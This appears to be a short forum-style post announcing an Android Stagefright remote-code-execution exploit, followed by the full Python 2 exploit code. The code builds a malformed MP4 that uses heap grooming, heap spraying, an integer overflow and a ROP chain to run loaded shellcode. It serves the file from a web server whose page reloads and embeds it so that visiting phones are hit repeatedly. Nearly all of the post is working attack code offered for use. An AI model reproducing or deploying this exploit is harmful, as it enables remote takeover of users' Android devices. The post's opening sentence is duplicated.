Hi GuyZ,
Recently an RCE vulnerability have detected in Android named `Stagefright`. Yesterday one more 0day RCE exploit has been released named `libstagefright`.
Recently an RCE vulnerability have detected in Android named `Stagefright`. Yesterday one more 0day RCE exploit has been released named `libstagefright`.
Exploit Code
#!/usr/bin/python2 import cherrypy import os import pwnlib.asm as asm import pwnlib.elf as elf import sys import struct with open('shellcode.bin', 'rb') as tmp: shellcode = tmp.read() while len(shellcode) % 4 != 0: shellcode += '\x00' # heap grooming configuration alloc_size = 0x20 groom_count = 0x4 spray_size = 0x100000 spray_count = 0x10 # address of the buffer we allocate for our shellcode mmap_address = 0x90000000 # addresses that we need to predict libc_base = 0xb6ebd000 spray_address = 0xb3000000 # ROP gadget addresses stack_pivot = None pop_pc = None pop_r0_r1_r2_r3_pc = None pop_r4_r5_r6_r7_pc = None ldr_lr_bx_lr = None ldr_lr_bx_lr_stack_pad = 0 mmap64 = None memcpy = None def find_arm_gadget(e, gadget): gadget_bytes = asm.asm(gadget, arch='arm') gadget_address = None for address in e.search(gadget_bytes): if address % 4 == 0: gadget_address = address if gadget_bytes == e.read(gadget_address, len(gadget_bytes)): print asm.disasm(gadget_bytes, vma=gadget_address, arch='arm') break return gadget_address def find_thumb_gadget(e, gadget): gadget_bytes = asm.asm(gadget, arch='thumb') gadget_address = None for address in e.search(gadget_bytes): if address % 2 == 0: gadget_address = address + 1 if gadget_bytes == e.read(gadget_address - 1, len(gadget_bytes)): print asm.disasm(gadget_bytes, vma=gadget_address-1, arch='thumb') break return gadget_address def find_gadget(e, gadget): gadget_address = find_thumb_gadget(e, gadget) if gadget_address is not None: return gadget_address return find_arm_gadget(e, gadget) def find_rop_gadgets(path): global memcpy global mmap64 global stack_pivot global pop_pc global pop_r0_r1_r2_r3_pc global pop_r4_r5_r6_r7_pc global ldr_lr_bx_lr global ldr_lr_bx_lr_stack_pad e = elf.ELF(path) e.address = libc_base memcpy = e.symbols['memcpy'] print '[*] memcpy : 0x{:08x}'.format(memcpy) mmap64 = e.symbols['mmap64'] print '[*] mmap64 : 0x{:08x}'.format(mmap64) # .text:00013344 ADD R2, R0, #0x4C # .text:00013348 LDMIA R2, {R4-LR} # .text:0001334C TEQ SP, #0 # .text:00013350 TEQNE LR, #0 # .text:00013354 BEQ botch_0 # .text:00013358 MOV R0, R1 # .text:0001335C TEQ R0, #0 # .text:00013360 MOVEQ R0, #1 # .text:00013364 BX LR pivot_asm = '' pivot_asm += 'add r2, r0, #0x4c\n' pivot_asm += 'ldmia r2, {r4 - lr}\n' pivot_asm += 'teq sp, #0\n' pivot_asm += 'teqne lr, #0' stack_pivot = find_arm_gadget(e, pivot_asm) print '[*] stack_pivot : 0x{:08x}'.format(stack_pivot) pop_pc_asm = 'pop {pc}' pop_pc = find_gadget(e, pop_pc_asm) print '[*] pop_pc : 0x{:08x}'.format(pop_pc) pop_r0_r1_r2_r3_pc = find_gadget(e, 'pop {r0, r1, r2, r3, pc}') print '[*] pop_r0_r1_r2_r3_pc : 0x{:08x}'.format(pop_r0_r1_r2_r3_pc) pop_r4_r5_r6_r7_pc = find_gadget(e, 'pop {r4, r5, r6, r7, pc}') print '[*] pop_r4_r5_r6_r7_pc : 0x{:08x}'.format(pop_r4_r5_r6_r7_pc) ldr_lr_bx_lr_stack_pad = 0 for i in range(0, 0x100, 4): ldr_lr_bx_lr_asm = 'ldr lr, [sp, #0x{:08x}]\n'.format(i) ldr_lr_bx_lr_asm += 'add sp, sp, #0x{:08x}\n'.format(i + 8) ldr_lr_bx_lr_asm += 'bx lr' ldr_lr_bx_lr = find_gadget(e, ldr_lr_bx_lr_asm) if ldr_lr_bx_lr is not None: ldr_lr_bx_lr_stack_pad = i break def pad(size): return '#' * size def pb32(val): return struct.pack(">I", val) def pb64(val): return struct.pack(">Q", val) def p32(val): return struct.pack("<I", val) def p64(val): return struct.pack("<Q", val) def chunk(tag, data, length=0): if length == 0: length = len(data) + 8 if length > 0xffffffff: return pb32(1) + tag + pb64(length)+ data return pb32(length) + tag + data def alloc_avcc(size): avcc = 'A' * size return chunk('avcC', avcc) def alloc_hvcc(size): hvcc = 'H' * size return chunk('hvcC', hvcc) def sample_table(data): stbl = '' stbl += chunk('stco', '\x00' * 8) stbl += chunk('stsc', '\x00' * 8) stbl += chunk('stsz', '\x00' * 12) stbl += chunk('stts', '\x00' * 8) stbl += data return chunk('stbl', stbl) def memory_leak(size): pssh = 'leak' pssh += 'L' * 16 pssh += pb32(size) pssh += 'L' * size return chunk('pssh', pssh) def heap_spray(size): pssh = 'spry' pssh += 'S' * 16 pssh += pb32(size) page = '' nop = asm.asm('nop', arch='thumb') while len(page) < 0x100: page += nop page += shellcode while len(page) < 0xed0: page += '\xcc' # MPEG4DataSource fake vtable page += p32(stack_pivot) # pivot swaps stack then returns to pop {pc} page += p32(pop_r0_r1_r2_r3_pc) # mmap64(mmap_address, # 0x1000, # PROT_READ | PROT_WRITE | PROT_EXECUTE, # MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, # -1, # 0); page += p32(mmap_address) # r0 = address page += p32(0x1000) # r1 = size page += p32(7) # r2 = protection page += p32(0x32) # r3 = flags page += p32(ldr_lr_bx_lr) # pc page += pad(ldr_lr_bx_lr_stack_pad) page += p32(pop_r4_r5_r6_r7_pc) # lr page += pad(4) page += p32(0x44444444) # r4 page += p32(0x55555555) # r5 page += p32(0x66666666) # r6 page += p32(0x77777777) # r7 page += p32(mmap64) # pc page += p32(0xffffffff) # fd (and then r4) page += pad(4) # padding (and then r5) page += p64(0) # offset (and then r6, r7) page += p32(pop_r0_r1_r2_r3_pc) # pc # memcpy(shellcode_address, # spray_address + len(rop_stack), # len(shellcode)); page += p32(mmap_address) # r0 = dst page += p32(spray_address - 0xed0) # r1 = src page += p32(0xed0) # r2 = size page += p32(0x33333333) # r3 page += p32(ldr_lr_bx_lr) # pc page += pad(ldr_lr_bx_lr_stack_pad) page += p32(pop_r4_r5_r6_r7_pc) # lr page += pad(4) page += p32(0x44444444) # r4 page += p32(0x55555555) # r5 page += p32(0x66666666) # r6 page += p32(0x77777777) # r7 page += p32(memcpy) # pc page += p32(0x44444444) # r4 page += p32(0x55555555) # r5 page += p32(0x66666666) # r6 page += p32(0x77777777) # r7 page += p32(mmap_address + 1) # pc while len(page) < 0x1000: page += '#' pssh += page * (size // 0x1000) return chunk('pssh', pssh) def exploit_mp4(): ftyp = chunk("ftyp","69736f6d0000000169736f6d".decode("hex")) trak = '' # heap spray so we have somewhere to land our corrupted vtable # pointer # yes, we wrap this in a sample_table for a reason; the # NuCachedSource we will be using otherwise triggers calls to mmap, # leaving our large allocations non-contiguous and making our chance # of failure pretty high. wrapping in a sample_table means that we # wrap the NuCachedSource with an MPEG4Source, making a single # allocation that caches all the data, doubling our heap spray # effectiveness :-) trak += sample_table(heap_spray(spray_size) * spray_count) # heap groom for our MPEG4DataSource corruption # get the default size allocations for our MetaData::typed_data # groom allocations out of the way first, by allocating small blocks # instead. trak += alloc_avcc(8) trak += alloc_hvcc(8) # we allocate the initial tx3g chunk here; we'll use the integer # overflow so that the allocated buffer later is smaller than the # original size of this chunk, then overflow all of the following # MPEG4DataSource object and the following pssh allocation; hence why # we will need the extra groom allocation (so we don't overwrite # anything sensitive...) # | tx3g | MPEG4DataSource | pssh | overflow = 'A' * 24 # | tx3g ----------------> | pssh | overflow += p32(spray_address) # MPEG4DataSource vtable ptr overflow += '0' * 0x48 overflow += '0000' # r4 overflow += '0000' # r5 overflow += '0000' # r6 overflow += '0000' # r7 overflow += '0000' # r8 overflow += '0000' # r9 overflow += '0000' # r10 overflow += '0000' # r11 overflow += '0000' # r12 overflow += p32(spray_address + 0x20) # sp overflow += p32(pop_pc) # lr trak += chunk("tx3g", overflow) # defragment the for alloc_size blocks, then make our two # allocations. we end up with a spurious block in the middle, from # the temporary ABuffer deallocation. # | pssh | - | pssh | trak += memory_leak(alloc_size) * groom_count # | pssh | - | pssh | .... | avcC | trak += alloc_avcc(alloc_size) # | pssh | - | pssh | .... | avcC | hvcC | trak += alloc_hvcc(alloc_size) # | pssh | - | pssh | pssh | avcC | hvcC | pssh | trak += memory_leak(alloc_size) * 8 # | pssh | - | pssh | pssh | avcC | .... | trak += alloc_hvcc(alloc_size * 2) # entering the stbl chunk triggers allocation of an MPEG4DataSource # object # | pssh | - | pssh | pssh | avcC | MPEG4DataSource | pssh | stbl = '' # | pssh | - | pssh | pssh | .... | MPEG4DataSource | pssh | stbl += alloc_avcc(alloc_size * 2) # | pssh | - | pssh | pssh | tx3g | MPEG4DataSource | pssh | # | pssh | - | pssh | pssh | tx3g ----------------> | overflow_length = (-(len(overflow) - 24) & 0xffffffffffffffff) stbl += chunk("tx3g", '', length = overflow_length) trak += chunk('stbl', stbl) return ftyp + chunk('trak', trak) index_page = ''' <!DOCTYPE html> <html> <head> <title>Stagefrightened!</title> </head> <body> <script> window.setTimeout('location.reload(true);', 4000); </script> <iframe src='/exploit.mp4'></iframe> </body> </html> ''' class ExploitServer(object): exploit_file = None exploit_count = 0 @cherrypy.expose def index(self): self.exploit_count += 1 print '*' * 80 print 'exploit attempt: ' + str(self.exploit_count) print '*' * 80 return index_page @cherrypy.expose(["exploit.mp4"]) def exploit(self): cherrypy.response.headers['Content-Type'] = 'video/mp4' cherrypy.response.headers['Content-Encoding'] = 'gzip' if self.exploit_file is None: exploit_uncompressed = exploit_mp4() with open('exploit_uncompressed.mp4', 'wb') as tmp: tmp.write(exploit_uncompressed) os.system('gzip exploit_uncompressed.mp4') with open('exploit_uncompressed.mp4.gz', 'rb') as tmp: self.exploit_file = tmp.read() os.system('rm exploit_uncompressed.mp4.gz') return self.exploit_file def main(): find_rop_gadgets('libc.so') with open('exploit.mp4', 'wb') as tmp: tmp.write(exploit_mp4()) cherrypy.quickstart(ExploitServer()) if __name__ == '__main__': main()